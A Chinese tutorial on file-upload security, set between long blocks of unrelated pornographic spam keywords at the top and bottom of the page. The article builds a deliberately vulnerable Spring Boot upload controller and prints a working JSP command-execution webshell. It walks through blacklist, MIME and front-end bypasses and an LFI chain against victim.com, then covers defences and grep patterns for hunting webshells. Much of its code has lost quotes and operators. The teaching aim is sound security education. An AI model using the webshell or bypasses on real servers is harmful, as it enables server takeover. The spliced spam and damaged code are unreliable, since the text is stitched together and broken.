色五月色开心色婷婷色丁香,五月婷婷丁香花综合网,婷婷丁香五月激情综合在线,五月婷婷六月丁香动漫,婷婷丁香五月激情综合在线,丁香花中文字幕在线观看,播五月色五月开心五月网,开心激情综合网,狠狠色丁香婷婷综合最新地址,丁香视频在线观看,狠狠做六月爱婷婷综合av,久久激情五月丁香伊人

ARTICLE DETAIL

資訊詳情

深耕商務(wù)建站與企業(yè)官網(wǎng)運(yùn)營的一線實(shí)戰(zhàn)洞察。

Web文件上傳安全:從漏洞原理到防御實(shí)戰(zhàn)

Web文件上傳安全:從漏洞原理到防御實(shí)戰(zhàn) 在實(shí)際 Web 開發(fā)與安全測試中文件上傳功能是業(yè)務(wù)剛需也是安全重災(zāi)區(qū)。一個看似簡單的上傳接口背后涉及前端校驗(yàn)、后端處理、文件存儲、權(quán)限控制、安全過濾等多個環(huán)節(jié)任何一個環(huán)節(jié)的疏忽都可能導(dǎo)致嚴(yán)重的安全漏洞例如惡意文件上傳、服務(wù)器被控制、數(shù)據(jù)泄露等。對于開發(fā)者而言理解如何安全地實(shí)現(xiàn)文件上傳對于安全研究者或滲透測試人員而言理解如何發(fā)現(xiàn)并利用文件上傳漏洞是兩項(xiàng)同等重要的核心技能。本文將以一個實(shí)戰(zhàn)視角深入探討 Web 文件上傳的完整流程、常見安全漏洞的成因、攻擊手法以及對應(yīng)的防御策略。我們將從開發(fā)一個基礎(chǔ)的文件上傳功能開始逐步引入安全風(fēng)險并演示攻擊者如何繞過層層防御最終目標(biāo)是構(gòu)建一個既滿足業(yè)務(wù)需求又具備足夠安全性的文件上傳模塊。無論你是正在開發(fā)相關(guān)功能的 Java 或 PHP 開發(fā)者還是正在學(xué)習(xí) CTFCapture The Flag中 Web 題目或進(jìn)行滲透測試的安全愛好者這篇文章都將提供從原理到實(shí)踐的具體指導(dǎo)。1. 理解文件上傳的核心流程與安全邊界文件上傳不僅僅是用戶選擇文件并點(diǎn)擊“提交”按鈕那么簡單。一個完整的、考慮安全性的文件上傳流程通常涉及客戶端瀏覽器、服務(wù)器端應(yīng)用程序、服務(wù)器運(yùn)行環(huán)境如 Tomcat、Nginx以及最終的文件存儲系統(tǒng)本地磁盤、對象存儲等多個層面。1.1 標(biāo)準(zhǔn)文件上傳流程分解當(dāng)用戶通過網(wǎng)頁表單上傳文件時數(shù)據(jù)會以multipart/form-data的格式編碼并通過 HTTP POST 請求發(fā)送到服務(wù)器。服務(wù)器端應(yīng)用程序如 Spring MVC、Servlet、PHP接收到請求后需要解析這些復(fù)雜的數(shù)據(jù)提取出文件內(nèi)容和其他表單字段。一個簡化的安全上傳流程應(yīng)包含以下步驟前端校驗(yàn)通過 JavaScript 檢查文件大小、類型后綴名提供即時反饋提升用戶體驗(yàn)。注意前端校驗(yàn)極易被繞過絕不能作為安全依賴。HTTP 請求接收Web 容器如 Tomcat或框架如 Spring解析multipart/form-data請求。后端校驗(yàn)核心安全環(huán)節(jié)文件類型校驗(yàn)檢查文件的真實(shí)類型而非僅依賴后綴名。常用方法包括檢查文件內(nèi)容魔數(shù)Magic Number、MIME 類型。文件大小限制在代碼和服務(wù)器配置如 Nginx、Tomcat層面限制上傳文件大小防止拒絕服務(wù)攻擊DoS。文件名處理對上傳的文件名進(jìn)行重命名如使用 UUID防止路徑遍歷和覆蓋關(guān)鍵文件。內(nèi)容安全檢查對圖片文件進(jìn)行二次渲染對文本文件進(jìn)行惡意代碼掃描。安全存儲目錄權(quán)限上傳目錄應(yīng)設(shè)置為不可執(zhí)行腳本。例如在 Linux 下目錄權(quán)限應(yīng)為755文件權(quán)限應(yīng)為644。目錄隔離文件不應(yīng)存儲在 Web 根目錄下應(yīng)通過程序映射訪問。例如文件實(shí)際存儲在/var/uploads/通過/file/{id}這樣的控制器接口讀取并返回。使用對象存儲將文件上傳至阿里云 OSS、騰訊云 COS 等對象存儲服務(wù)徹底分離 Web 服務(wù)器和文件存儲。訪問控制對下載或訪問上傳文件的接口進(jìn)行權(quán)限校驗(yàn)防止未授權(quán)訪問。1.2 文件上傳漏洞的本質(zhì)文件上傳漏洞產(chǎn)生的根本原因在于服務(wù)器對用戶上傳的文件數(shù)據(jù)未進(jìn)行充分、有效的驗(yàn)證導(dǎo)致攻擊者能夠上傳被服務(wù)器解釋執(zhí)行的可執(zhí)行文件如.jsp,.php,.asp或特定配置下的.jpg。攻擊成功的關(guān)鍵在于上傳的文件必須能夠被 Web 服務(wù)器以某種方式“執(zhí)行”。例如上傳一個.jsp文件到 Tomcat 的 Web 應(yīng)用目錄該文件就會被 Tomcat 的 JSP 引擎編譯執(zhí)行。上傳一個.php文件到 Apache PHP 環(huán)境的網(wǎng)站根目錄該文件就會被 PHP 解析器執(zhí)行。在某些錯誤配置下上傳一個包含 PHP 代碼的.jpg文件如果服務(wù)器配置了AddType application/x-httpd-php .jpg該圖片文件也會被當(dāng)作 PHP 執(zhí)行。2. 環(huán)境準(zhǔn)備與靶場搭建為了清晰地演示漏洞和防御我們需要一個實(shí)驗(yàn)環(huán)境。你可以選擇以下任意一種方式2.1 使用 Docker 快速搭建漏洞靶場對于安全學(xué)習(xí)使用現(xiàn)成的漏洞靶場是最快的方式。這里推薦upload-labs一個專注于文件上傳漏洞的練習(xí)平臺。# 1. 確保已安裝 Docker docker --version # 2. 拉取 upload-labs 鏡像 docker pull c0ny1/upload-labs # 3. 運(yùn)行容器將容器內(nèi)80端口映射到宿主機(jī)的8080端口 docker run -d -p 8080:80 --name upload-labs c0ny1/upload-labs # 4. 訪問 http://localhost:8080 即可開始挑戰(zhàn)2.2 手動創(chuàng)建簡易漏洞演示項(xiàng)目Java Web如果你想從開發(fā)者視角理解漏洞產(chǎn)生可以創(chuàng)建一個簡單的 Spring Boot 項(xiàng)目。項(xiàng)目初始化使用 Spring Initializr 或 IDE 創(chuàng)建一個 Spring Boot 項(xiàng)目依賴選擇Spring Web和Thymeleaf用于簡單前端。創(chuàng)建上傳頁面(src/main/resources/templates/upload.html)!DOCTYPE html html xmlns:thhttp://www.thymeleaf.org head meta charsetUTF-8 title不安全的上傳演示/title /head body h2文件上傳不安全版本/h2 form action/upload methodpost enctypemultipart/form-data input typefile namefile / br/br/ input typesubmit value上傳 / /form p th:text${message}/p /body /html創(chuàng)建漏洞控制器(src/main/java/com/example/demo/controller/UnsafeUploadController.java)import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.multipart.MultipartFile; import org.springframework.web.servlet.ModelAndView; import java.io.File; import java.io.IOException; Controller public class UnsafeUploadController { // 定義一個不安全的存儲路徑在Web可訪問目錄下 private final String UPLOAD_DIR src/main/resources/static/uploads/; GetMapping(/) public String index() { return upload; } PostMapping(/upload) public ModelAndView handleFileUpload(RequestParam(file) MultipartFile file) { ModelAndView mav new ModelAndView(upload); if (file.isEmpty()) { mav.addObject(message, 請選擇一個文件上傳。); return mav; } try { // 漏洞點(diǎn)1直接使用原始文件名存在路徑遍歷風(fēng)險 String fileName file.getOriginalFilename(); // 漏洞點(diǎn)2文件存儲在Web靜態(tài)資源目錄下可直接通過URL訪問 File dest new File(UPLOAD_DIR fileName); // 創(chuàng)建目錄如果不存在 dest.getParentFile().mkdirs(); file.transferTo(dest); mav.addObject(message, 文件上傳成功: dest.getAbsolutePath()); } catch (IOException e) { e.printStackTrace(); mav.addObject(message, 文件上傳失敗: e.getMessage()); } return mav; } }配置(src/main/resources/application.properties)# 設(shè)置單個文件最大大小僅為示例實(shí)際需要更多配置 spring.servlet.multipart.max-file-size10MB spring.servlet.multipart.max-request-size10MB運(yùn)行這個 Spring Boot 應(yīng)用你就擁有了一個具備典型漏洞的上傳點(diǎn)。3. 常見文件上傳漏洞攻擊手法與演示我們將基于上面創(chuàng)建的簡易漏洞項(xiàng)目演示幾種常見的攻擊手法。3.1 攻擊手法一直接上傳 Webshell這是最基礎(chǔ)的情況服務(wù)器未做任何過濾。準(zhǔn)備 Webshell創(chuàng)建一個簡單的 JSP Webshell 文件shell.jsp。% page importjava.util.*,java.io.*% % // 非常簡單的命令執(zhí)行Webshell if(request.getParameter(cmd) ! null) { Process p Runtime.getRuntime().exec(request.getParameter(cmd)); OutputStream os p.getOutputStream(); InputStream in p.getInputStream(); DataInputStream dis new DataInputStream(in); String disr dis.readLine(); while ( disr ! null ) { out.println(disr); disr dis.readLine(); } } %發(fā)起攻擊訪問http://localhost:8080/選擇shell.jsp文件并上傳。訪問 Webshell如果上傳成功文件將位于http://localhost:8080/uploads/shell.jsp。訪問該 URL并附加參數(shù)?cmdwhoami即可在頁面上看到服務(wù)器執(zhí)行whoami命令的結(jié)果。漏洞原因后端代碼未對文件后綴名、內(nèi)容做任何檢查且文件存儲在 Web 可訪問目錄。3.2 攻擊手法二繞過前端校驗(yàn)很多網(wǎng)站僅在前端通過 JavaScript 檢查文件后綴名。前端校驗(yàn)示例在upload.html的form標(biāo)簽前添加 JS 代碼。script function checkFile() { var file document.querySelector(input[typefile]).files[0]; var fileName file.name; var ext fileName.substring(fileName.lastIndexOf(.) 1).toLowerCase(); if (ext ! jpg ext ! png ext ! gif) { alert(只允許上傳圖片文件 (jpg, png, gif)); return false; } return true; } /script form ... onsubmitreturn checkFile() ...繞過方法方法A禁用JS在瀏覽器設(shè)置中禁用 JavaScript即可直接上傳任意文件。方法B代理攔截修改使用 Burp Suite 或 Fiddler 等抓包工具。先正常選擇一個test.jpg文件上傳用抓包工具截獲 POST 請求。在抓包工具中將請求體中的文件名test.jpg修改為shell.jsp同時確保文件內(nèi)容Content-Disposition部分和后續(xù)的二進(jìn)制內(nèi)容是正確的 Webshell 代碼。將修改后的請求發(fā)送給服務(wù)器。結(jié)果服務(wù)器接收到的是shell.jsp的文件名和內(nèi)容前端校驗(yàn)被完全繞過。漏洞原因信任了完全由客戶端控制的數(shù)據(jù)。3.3 攻擊手法三繞過黑名單校驗(yàn)特殊解析漏洞假設(shè)后端采用了黑名單機(jī)制禁止了.jsp,.php,.asp等后綴。// 在Controller中添加黑名單檢查 String[] blackList {.jsp, .php, .asp, .aspx, .jspx}; String fileName file.getOriginalFilename().toLowerCase(); for (String badExt : blackList) { if (fileName.endsWith(badExt)) { mav.addObject(message, 禁止上傳此類文件); return mav; } }攻擊者可以嘗試以下繞過方式大小寫繞過.Jsp,.PhP如果后端校驗(yàn)時未統(tǒng)一轉(zhuǎn)為小寫。雙寫后綴繞過shell.jsp.jsp如果后端只簡單地刪除一次.jsp字符串。空格/點(diǎn)號繞過shell.jsp.或shell.jsp末尾空格在某些系統(tǒng)處理文件名時會被忽略。利用解析特性Apache如果配置不當(dāng)shell.php.jpg可能被解析為.php文件。IIS 6.0shell.asp;.jpg或shell.asp:.jpg目錄名曾是有名的解析漏洞。Nginx錯誤配置fastcgi導(dǎo)致shell.jpg/.php被解析為 PHP 文件。.htaccess攻擊針對 Apache如果服務(wù)器允許上傳.htaccess文件攻擊者可以上傳一個自定義的.htaccess內(nèi)容為AddType application/x-httpd-php .jpg這將使該目錄下所有.jpg文件都被當(dāng)作 PHP 執(zhí)行。然后再上傳一個包含 PHP 代碼的shell.jpg即可。3.4 攻擊手法四繞過內(nèi)容類型MIME校驗(yàn)有些后端會檢查 HTTP 請求頭中的Content-Type。// 檢查Content-Type if (!file.getContentType().equals(image/jpeg) !file.getContentType().equals(image/png)) { mav.addObject(message, 文件類型不正確); return mav; }繞過方法和繞過前端校驗(yàn)一樣使用抓包工具如 Burp Suite直接修改請求頭中的Content-Type將其改為image/jpeg而請求體中的文件內(nèi)容仍然是 Webshell。漏洞原因Content-Type同樣來自客戶端請求頭完全可控不可信。3.5 攻擊手法五利用文件包含漏洞配合上傳這是一種組合攻擊。假設(shè)網(wǎng)站存在文件包含漏洞如 PHP 的include($_GET[‘file’])且上傳功能對圖片內(nèi)容做了嚴(yán)格檢查如二次渲染導(dǎo)致無法直接上傳可執(zhí)行腳本。攻擊步驟上傳一個內(nèi)容為?php phpinfo();?的純文本文件命名為info.txt。由于內(nèi)容是文本可能通過檢查。利用文件包含漏洞訪問http://victim.com/include.php?file./uploads/info.txt。服務(wù)器執(zhí)行了include將info.txt的內(nèi)容作為 PHP 代碼解析從而執(zhí)行了phpinfo()。漏洞原因上傳點(diǎn)與文件包含漏洞點(diǎn)形成“組合拳”本地文件包含LFI可以包含用戶上傳的文件。4. 構(gòu)建安全的文件上傳功能了解了攻擊方式我們就可以有針對性地構(gòu)建防御。安全是一個過程需要多層防護(hù)。4.1 防御策略總覽防御層具體措施目的前端JS 校驗(yàn)文件大小、類型改善用戶體驗(yàn)非安全措施網(wǎng)絡(luò)層WAFWeb應(yīng)用防火墻攔截已知攻擊payload應(yīng)用層核心1. 白名單文件后綴2. 校驗(yàn)文件類型魔數(shù)3. 重命名文件UUID4. 限制文件大小5. 圖片二次渲染/壓縮6. 病毒/惡意代碼掃描實(shí)現(xiàn)業(yè)務(wù)邏輯層面的安全校驗(yàn)服務(wù)器配置1. 上傳目錄無執(zhí)行權(quán)限2. 資源文件通過程序讀取3. 定期清理未關(guān)聯(lián)文件防止上傳的文件被直接執(zhí)行架構(gòu)層使用對象存儲OSS/COS實(shí)現(xiàn)業(yè)務(wù)服務(wù)器與文件存儲分離4.2 安全上傳代碼實(shí)現(xiàn)Java Spring Boot 示例下面是一個相對安全的文件上傳控制器實(shí)現(xiàn)import org.springframework.beans.factory.annotation.Value; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.*; import org.springframework.web.multipart.MultipartFile; import org.apache.commons.io.FilenameUtils; import org.apache.tika.Tika; import javax.imageio.ImageIO; import java.awt.image.BufferedImage; import java.io.*; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.util.Arrays; import java.util.List; import java.util.UUID; Controller public class SafeUploadController { // 從配置文件中讀取確保不在Web目錄下 Value(${app.upload.dir:/var/uploads/}) private String uploadBaseDir; // 允許上傳的文件類型白名單后綴名 private static final ListString ALLOWED_EXTENSIONS Arrays.asList(jpg, jpeg, png, gif); // 允許的MIME類型白名單 private static final ListString ALLOWED_MIME_TYPES Arrays.asList(image/jpeg, image/png, image/gif); // 最大文件大小 5MB private static final long MAX_FILE_SIZE 5 * 1024 * 1024; PostMapping(/safe-upload) ResponseBody public String handleSafeFileUpload(RequestParam(file) MultipartFile file) { // 1. 檢查文件是否為空 if (file.isEmpty()) { return 文件為空。; } // 2. 檢查文件大小 if (file.getSize() MAX_FILE_SIZE) { return 文件大小超過限制5MB。; } // 3. 校驗(yàn)文件后綴名白名單 String originalFileName file.getOriginalFilename(); String fileExtension FilenameUtils.getExtension(originalFileName).toLowerCase(); if (!ALLOWED_EXTENSIONS.contains(fileExtension)) { return 不支持的文件類型。; } // 4. 校驗(yàn)文件真實(shí)類型使用Apache Tika檢測魔數(shù) try { Tika tika new Tika(); String detectedType tika.detect(file.getBytes()); if (!ALLOWED_MIME_TYPES.contains(detectedType)) { return 文件真實(shí)類型與后綴名不符或不被允許。; } } catch (IOException e) { return 文件類型檢測失敗。; } // 5. 如果是圖片可以進(jìn)行二次渲染徹底清除元數(shù)據(jù)和非圖像數(shù)據(jù) if (fileExtension.matches(jpg|jpeg|png|gif)) { try { BufferedImage image ImageIO.read(file.getInputStream()); if (image null) { return 上傳的文件不是有效的圖片。; } // 這里可以添加圖片壓縮、縮放等處理 // ImageIO.write(image, png, ...); } catch (IOException e) { return 圖片處理失敗文件可能已損壞。; } } // 6. 生成安全的存儲文件名和路徑 String safeFileName UUID.randomUUID().toString() . fileExtension; // 使用UUID重命名 Path uploadPath Paths.get(uploadBaseDir).toAbsolutePath().normalize(); Path filePath uploadPath.resolve(safeFileName); // 確保上傳目錄存在且安全 try { Files.createDirectories(uploadPath); // 重要檢查目錄是否在預(yù)期范圍內(nèi)防止路徑遍歷 if (!filePath.normalize().startsWith(uploadPath.normalize())) { return 無效的文件路徑。; } } catch (IOException e) { return 無法創(chuàng)建上傳目錄。; } // 7. 保存文件 try (InputStream inputStream file.getInputStream()) { Files.copy(inputStream, filePath); } catch (IOException e) { return 文件保存失敗。; } // 8. 返回文件訪問ID非真實(shí)路徑通過另一個安全接口訪問 String fileId safeFileName; // 實(shí)際可能用數(shù)據(jù)庫關(guān)聯(lián)ID return 文件上傳成功。訪問ID: fileId; } // 安全訪問文件的接口 GetMapping(/file/{fileId}) public void getFile(PathVariable String fileId, HttpServletResponse response) { // 1. 根據(jù)fileId從數(shù)據(jù)庫或緩存中查詢真實(shí)文件名和路徑此處簡化 // 2. 進(jìn)行權(quán)限校驗(yàn)如用戶是否登錄、是否有權(quán)訪問此文件 // 3. 從安全的存儲目錄讀取文件流 Path filePath Paths.get(uploadBaseDir, fileId).normalize(); File file filePath.toFile(); if (!file.exists()) { response.setStatus(HttpServletResponse.SC_NOT_FOUND); return; } // 4. 設(shè)置正確的Content-Type并輸出流 response.setContentType(Files.probeContentType(filePath)); try (OutputStream os response.getOutputStream(); FileInputStream fis new FileInputStream(file)) { byte[] buffer new byte[1024]; int bytesRead; while ((bytesRead fis.read(buffer)) ! -1) { os.write(buffer, 0, bytesRead); } os.flush(); } catch (IOException e) { response.setStatus(HttpServletResponse.SC_INTERNAL_SERVER_ERROR); } } }關(guān)鍵防御點(diǎn)解釋白名單校驗(yàn)只允許明確需要的文件類型。文件類型檢測使用 Apache Tika 等庫通過文件內(nèi)容的魔數(shù)判斷真實(shí)類型不信任后綴名和Content-Type。圖片二次渲染使用ImageIO.read和write處理圖片可以剝離可能隱藏在元數(shù)據(jù)如 EXIF或文件冗余數(shù)據(jù)區(qū)中的惡意代碼。文件重命名使用 UUID 等隨機(jī)字符串避免文件名沖突和路徑遍歷攻擊。路徑安全使用Paths.get().normalize()和startsWith()檢查防止../../../etc/passwd這類路徑遍歷。存儲隔離文件存儲在 Web 根目錄之外如/var/uploads/不能通過http://domain/uploads/xxx直接訪問必須通過后端控制器/file/{id}進(jìn)行鑒權(quán)后訪問。4.3 服務(wù)器與中間件安全配置代碼層面的安全需要配合服務(wù)器配置才能生效。Nginx 配置示例防止上傳目錄執(zhí)行腳本location ^~ /uploads/ { # 如果文件必須放在Web目錄下則禁止執(zhí)行任何腳本 location ~* \.(jsp|php|asp|aspx|pl|py)$ { deny all; return 403; } # 或者對于上傳目錄直接返回403 # deny all; # return 403; }Apache 配置示例在.htaccess或httpd.conf中Directory /var/www/html/uploads # 禁止執(zhí)行任何腳本 php_flag engine off RemoveHandler .php .php3 .php4 .php5 .php7 .phtml RemoveType .php .php3 .php4 .php5 .php7 .phtml # 只允許訪問圖片等靜態(tài)文件 FilesMatch \.(jpg|jpeg|png|gif|ico|txt|pdf)$ Order Allow,Deny Allow from all /FilesMatch FilesMatch \.(php|pl|py|jsp|asp|sh|cgi)$ Order Deny,Allow Deny from all /FilesMatch /DirectoryLinux 目錄權(quán)限# 上傳目錄應(yīng)屬于運(yùn)行Web服務(wù)的用戶如www-data, tomcat chown -R www-data:www-data /var/uploads/ # 目錄權(quán)限755文件權(quán)限644確保目錄不可寫除非需要上傳 chmod 755 /var/uploads/ # 如果程序需要寫文件可以設(shè)置目錄為775但務(wù)必確保沒有執(zhí)行權(quán)限問題5. 文件上傳漏洞的排查與應(yīng)急響應(yīng)即使采取了措施也可能存在未知的繞過方式。需要建立監(jiān)控和響應(yīng)機(jī)制。5.1 如何發(fā)現(xiàn)文件上傳漏洞作為開發(fā)者/防御方代碼審計檢查文件上傳相關(guān)代碼是否僅依賴黑名單、是否未校驗(yàn)內(nèi)容、是否存儲路徑可訪問。日志分析監(jiān)控上傳接口的訪問日志尋找異常請求如頻繁上傳、異常后綴、過大文件。文件系統(tǒng)監(jiān)控使用inotify等工具監(jiān)控上傳目錄警惕非圖片文件尤其是.jsp,.php,.htaccess的出現(xiàn)。安全掃描使用 AWVS、Nessus 或開源工具定期對上傳功能進(jìn)行掃描。作為攻擊方/滲透測試方模糊測試使用 Burp Suite Intruder 或自定義腳本批量嘗試各種繞過技巧大小寫、雙寫、特殊字符、不同 Content-Type。解析漏洞測試針對特定服務(wù)器IIS, Nginx, Apache測試歷史解析漏洞的變種。組合漏洞測試檢查是否存在文件包含、任意文件讀取等漏洞可與上傳點(diǎn)結(jié)合利用。5.2 常見問題排查清單當(dāng)懷疑存在文件上傳漏洞或已遭攻擊時按此清單排查排查項(xiàng)操作命令/檢查點(diǎn)說明1. 檢查近期上傳文件find /var/www/html/uploads -type f -mtime -1(查找1天內(nèi)修改的文件)快速定位可疑新增文件。2. 查找Webshell特征grep -r Runtime.getRuntime|eval(|system(|passthru|shell_exec /var/www/html/在Web目錄中搜索常見危險函數(shù)。3. 檢查服務(wù)器進(jìn)程ps auxgrep java|php|tomcat或netstat -tulnp4. 分析Web訪問日志tail -f /var/log/nginx/access.log | grep \POST.*upload\或搜索.jsp,.php的訪問記錄。定位攻擊來源和攻擊時間。5. 檢查定時任務(wù)crontab -l(當(dāng)前用戶) 和ls /etc/cron.*Webshell 常會添加后門定時任務(wù)。6. 檢查系統(tǒng)用戶cat /etc/passwd查看是否有新增的未知用戶。7. 驗(yàn)證修復(fù)是否生效重新嘗試之前成功的攻擊 payload確認(rèn)是否被攔截。確保修復(fù)措施已生效。5.3 應(yīng)急響應(yīng)步驟隔離立即禁用文件上傳功能或整個應(yīng)用。定位根據(jù)上述排查清單找到被上傳的惡意文件。清除刪除所有發(fā)現(xiàn)的 Webshell 和異常文件。注意檢查文件創(chuàng)建時間、隱藏文件以.開頭、以及可能被插入惡意代碼的正常文件。溯源分析日志確定攻擊入口、攻擊者 IP、攻擊時間線。修復(fù)根據(jù)漏洞原因?qū)嵤┍菊碌?節(jié)的安全措施。加固修復(fù)服務(wù)器配置審查所有上傳點(diǎn)代碼考慮引入 WAF 規(guī)則。監(jiān)控加強(qiáng)日志審計和文件監(jiān)控設(shè)置告警。6. 進(jìn)階話題與最佳實(shí)踐6.1 使用對象存儲服務(wù)將文件上傳至云端對象存儲如阿里云 OSS、騰訊云 COS、MinIO是當(dāng)前的最佳實(shí)踐。它帶來了多重好處安全分離業(yè)務(wù)服務(wù)器與文件存儲分離即使文件被上傳惡意腳本也無法在業(yè)務(wù)服務(wù)器上執(zhí)行。彈性擴(kuò)展存儲容量和帶寬易于擴(kuò)展。高可用與持久性對象存儲通常提供多副本冗余。便捷處理很多服務(wù)提供圖片處理、視頻截幀等能力。集成時通常由業(yè)務(wù)服務(wù)器向?qū)ο蟠鎯Ψ?wù)商申請一個臨時的上傳憑證STS Token前端直接使用該憑證將文件上傳至對象存儲上傳成功后對象存儲回調(diào)業(yè)務(wù)服務(wù)器或前端通知業(yè)務(wù)服務(wù)器文件信息如 URL。業(yè)務(wù)服務(wù)器只保存文件的元信息如存儲路徑、大小、類型不直接處理文件流。6.2 文件內(nèi)容深度檢查對于高風(fēng)險場景需要更深入的內(nèi)容檢查反病毒掃描集成 ClamAV 等開源殺毒引擎對上傳文件進(jìn)行掃描。靜態(tài)代碼分析對于允許上傳的文本文件如 PDF, DOC可以檢查是否包含惡意宏或腳本。沙箱動態(tài)檢測對于無法確認(rèn)的文件可以將其在隔離的沙箱環(huán)境中運(yùn)行觀察其行為。6.3 針對 CTF 與滲透測試的特別技巧在 CTF 或授權(quán)滲透測試中目標(biāo)往往是刻意存在漏洞的。除了上述常見方法還需注意信息收集查看網(wǎng)頁源碼、JS 文件尋找隱藏的上傳點(diǎn)或提示。檢查 HTTP 響應(yīng)頭有時錯誤信息或特殊的響應(yīng)頭會提示服務(wù)器類型、組件版本。嘗試各種解析漏洞研究目標(biāo)服務(wù)器Apache/Nginx/IIS/Tomcat特定版本的已知解析漏洞。利用條件競爭如果服務(wù)器先保存文件再檢查內(nèi)容可能存在時間差可以嘗試在文件被刪除前訪問并執(zhí)行它。結(jié)合其他漏洞如目錄遍歷、文件包含、XXEXML外部實(shí)體注入等與文件上傳結(jié)合形成攻擊鏈。文件上傳功能是 Web 安全的試金石。一個健壯的上傳模塊需要開發(fā)者具備防御性編程思維不信任任何來自客戶端的數(shù)據(jù)并在前端、后端、服務(wù)器配置、網(wǎng)絡(luò)架構(gòu)多個層面實(shí)施縱深防御。對于安全人員而言理解攻擊者的繞過手法是進(jìn)行有效代碼審計和滲透測試的基礎(chǔ)。在實(shí)踐中沒有一勞永逸的銀彈持續(xù)關(guān)注新的攻擊手法定期審查和更新安全策略才是保障系統(tǒng)安全的關(guān)鍵。建議將本文中的安全代碼示例作為起點(diǎn)結(jié)合項(xiàng)目的具體業(yè)務(wù)邏輯和架構(gòu)構(gòu)建適合自身的安全上傳方案。
返回列表
PREV
查看更多資訊
NEXT
返回資訊列表
97超碰免费生活| 蜜臀99久| 在线人人人人人人精品超 | 国产白丝AV| 综合av影片| 国产网红精品| 男女猛烈无遮掩视频免费软件| 伊人丝袜美腿高跟在线观看高清| 97操97色| 色妺妺在线视频| 国产女人和拘做爰视频 | 中文字幕人成乱码熟女香港| …亚洲黄色厕厕女女在线播…| 中国小夫妻勾搭露脸淫荡对白| 久99| 日本日皮视频逼| 人人 操人人 操人人| 97鸡把在线视频| 夜夜福利| av影院十区| 啪啪综合网| 偷拍片久久| 牛牛久久国产精品视频一二三| 五月婷婷啪啪| 在线播放中文字幕| 中文在线久久字幕| 草伊人高潮喷水超碰| 亚码激情| 欧美性天天影视| 去干网最新版| 国产熟女少妇一区| 免费视频无码| 天美av在线观看| 五月丁香狠狠爱| 天天干人妇| 亚洲欧洲日韩国产自在线| 亚洲 小说 欧美 激情 另类| 日韩在线性爱免费视频| 青娱乐久久艹| 日本国产成人亚洲精品无码| 精品人妻伦一二三区久久| 日本午夜福利影院| 久久不卡一区二区 | 日韩中文字幕精品一二三事国产精品| 国产天美传媒精品| 日本ZZ高免费A级视频| 精品人妻视频一区二区在线播放| 热热色国产一二区AV| 校园春色宗合网| 97色操| 色香综合| 欧美一二三级精品在线| 久久久久久69国产一区二区| 午夜福利免费精品视频| 日本一区二区三区精品| 无毛精品| 9丨久久九九九| 欧美人人操人人插| 亚洲日韩美女中文字幕乱| 久久精品三级影视| 久久嫩草国产成人一区| 人妻丝袜肏逼| 国语精品av| 无码不卡亚洲成?人片| 久久成年片色大黄全免费网站| 国产一区二区三区高清视频| 欧美黄片欧美黄片xxx| 日韩成人精品中文字幕| 久久久性爱视频| 好舒服视频| 综合亚洲网| 2017亚洲天堂| 国产精品黄色三级av| 国模精品一区二区三区苹果色戒| 亚洲国产欧美日韩人妻日中文| 九九热免费国产视频婷婷伊人五月 | 91精品国产日韩欧美综合| 97最新在线播放视频| 色色色色色色色色色色色色色色综合| 国产女人9999| 国产专区第一页| 青青草操逼逼视频| 色娱乐色呦呦夜夜夜夜av| 丰满人妻一区二区中文| 亚洲av性爱电影| 国产精品探花在线| n1038 一二三区| 亚洲第一男人天堂| 欧美成人A√在线一区二区| 一级免费啪啪片| 国产免费久久精品99re韩国| 超碰97欧美| 亚洲导航深夜福利| 久久久婷婷| 2020中文字幕在线| 91视频国品一二三区| 啊嗯嗯啊好大好爽| 国产精品久久久无码aV去| 亚洲九区| 精品一区二区2| 顶级丝袜熟女一区二区三区| 亚洲天堂美臀在线| 国产v片在线免费观看| 天天日天天爽| 久久9免费视频| 青草青草久热| 亚洲欧美日韩中文久久自慰| 91色人妻| 蜜桃视频一区二区三区在线观看| 人妻精品一区二区在线| 青草香蕉网| 成人毛片免费| 丝袜狠狠草尤物人妻av91| 亚洲图片 欧美电影| 国产一区二区欧美日本| 国产精品扒开腿做爽爽爽视频| 久久这里都是精品| 98久久超碰| 丁香婷婷久久| 国产区在线| 亚洲欧美日韩精品久久久一区二区| 宗合情欲网| 69一区二区| 嗯啊不要在线| 色就色综合| 91精品婷婷国产综合久久竹菊| 国产真乱mangent| 蜜臀精品1区2区| 乱伦日本中文自拍| 330Dv国产女人终合视频极品人与兽 | 日本一区二区三区四区免费观看| 亚洲日韩视频二区| 欧美性爱网97| AV无码久久久精品| 一区二区视频在看| 久久久久成人蜜桃精品| 插入逼91| 性生活无遮挡纯毛片在线看| 三级网色| 久久精品一区二区| 人妻熟女一区二区三区在线| av凤凰久久久| 久久久9999| 亚洲欧美中日韩| 一级成人性爱| 国产精品久久久午夜夜伦鲁鲁| 乱伦熟女区| 亚洲风情在线观看| 啊啊啊不要啊啊受不了了视频在线| 国产精品福利视频播放| 欧美体内射精| 日韩精品.久久精品.AV女优.天美传媒| 超碰78| 少妇与黑人高潮在线| 欧美成熟性爱精品| 男女性扦B| 最新日韩黄片| 东北少妇高潮zzzz| 91黑丝操| 又黄又粗又硬又长又大| 亚洲激情综合| 久久毛卡| 九九色综合| 亚洲超碰97| 亚洲999综合| 日本人体九九九九九九| 亚洲欧美日韩精品久久久一区二区| 久久97精品久久久久久久不卡| 大香蕉伊人在线成人AV在线观看| 久久精品人体| 国产精品久久久久久久黄无码| 成人三级片一区二区三区视频| 欧美熟妇人体| 久久天天性久久伊人| 人人插人人摸人人| 中文字幕日韩专区精品系列| 一本久久久精品| 大香蕉国产中文自拍| 日本熟女中文| 乱伦av麻豆| 亚洲国产丝袜熟女av| 日韩欧美资源| 黄色小说亚洲| 无码色| 在线中文字幕极品av| 国产美女自拍AV| 熟妇人妻丰满久久久久久久无码| 91影视亚洲| 91在线视频免费中出| 成人国产精品三级A片| 亚洲无线码欧洲精品区别| 97鸡把在线视频| 国产视频第2页| 乱理日韩中文| 久久天天摸| 人人天天欧洲| 国产玖玖| 这里有精品| 日本熟女中文| 26uuu国产| 午夜欧美女人操逼| 开心五月深爱五月| 99操视频| 91老熟女逼| 伊人成人中文字幕久久网| 五月色综合| 91丨九色丨43老版熟女| 天天插天天操| 能看的av| 天天摸天天插天天日| 99色热| 丁香五月社区| 久久久久久久久九九久孕交| 